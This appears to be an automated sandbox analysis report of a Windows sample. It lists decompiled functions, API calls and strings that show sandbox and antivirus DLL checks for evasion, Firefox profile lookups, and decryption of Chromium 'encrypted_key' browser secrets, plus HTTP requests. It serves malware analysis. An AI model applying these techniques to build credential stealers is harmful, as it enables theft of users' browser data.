                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcatmemcmpstrlen$??3@FileFindFirstlstrlenmemmove
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$\..\$prefs.js$profiles.ini
                                                                                                                                                                                                                                                                                                  • API String ID: 3809920955-2608480989
                                                                                                                                                                                                                                                                                                  • Opcode ID: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 416ba331a07f3905739cc071a47e34269f16b80876d8e7813359335a266a51ee
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4932D7319002189BCB14EBB1C9D5AEEB778BF48304F40455EF41667192DF7CAAC9CBA9
                                                                                                                                                                                                                                                                                                  Function 004170D0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 117stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileFindstrcpy$strlenwsprintf$CloseFirstFolderNextOperationPath_splitpathisupper
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*$.
                                                                                                                                                                                                                                                                                                  • API String ID: 3519957579-2663966076
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                                  • Instruction ID: 114bed65e9d4b9d73eb4094e4860af952423d6fe10318c0fdbdbb5acdc2bd80f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8413B71908348AFD2209B21DC05BEB77BCAFD5304F04452EF99982251E779A689C7AB
                                                                                                                                                                                                                                                                                                  Function 004011F0 Relevance: 25.6, APIs: 6, Strings: 11, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,avghookx.dll,?,?,?,004185FC), ref: 0040121E
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,avghooka.dll,?,?,?,004185FC), ref: 0040124E
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,snxhk.dll,?,?,?,004185FC), ref: 0040127E
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,sbiedll.dll,?,?,?,004185FC), ref: 004012AE
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,api_log.dll,?,?,?,004185FC), ref: 004012DE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004011B0: lstrcmpiW.KERNEL32(?,?,7622F360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,dir_watch.dll,?,?,?,004185FC), ref: 0040130E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                  • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1586166983-3272603366
                                                                                                                                                                                                                                                                                                  • Opcode ID: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                                                  • Instruction ID: 41c0b1b83a52b27a2bdfeff9d3ed397a321de4e9cb8fcf5d4a551c39b82ef4d0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D431AD323413509BCB119B05C8C0F253362AF99B98FAE01F6E902BB7B7D27C9C41865D
                                                                                                                                                                                                                                                                                                  Function 00404280 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 173networkfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004043F0
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040446D
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404478
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$Http$CloseHandleOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: ERROR$GET$HTTP/1.1$https
                                                                                                                                                                                                                                                                                                  • API String ID: 1693188093-2961588264
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3507938dcee9cc1a0527973a4bd5b6eba6c84462808e0f35a45f5f60c0c7131e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D451D771A00319ABDB10DFA4DC85FFF7779AF84704F00452AFA05A7281DB78A985CBA5
                                                                                                                                                                                                                                                                                                  Function 004078F0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 264memorystringencryptionCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32 ref: 00407AFA
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00407B13
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00407B39
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407BC2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Local$Alloc$File$Freelstrlen$CloseCreateCryptDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: "encrypted_key":"$AES$ChainingMode$ChainingModeGCM$DPAP$_key.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 72760943-530840575
                                                                                                                                                                                                                                                                                                  • Opcode ID: 435e02cac9d3189bb6a0e32f5ba4430a7db214667b4bc7f45e48a8d50eae63c0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 10bc9677902d6ee6c816a36e6349628b10f5ac32de00f2ba7c41a4f543123621
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 435e02cac9d3189bb6a0e32f5ba4430a7db214667b4bc7f45e48a8d50eae63c0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93A1C571E042159BDB10DFA1CC85BAE7BB5FF44304F10452AE901BB291D778BA45CBA6
                                                                                                                                                                                                                                                                                                  Function 00409460 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 341filestringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 004094C5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004095D2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00409766
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
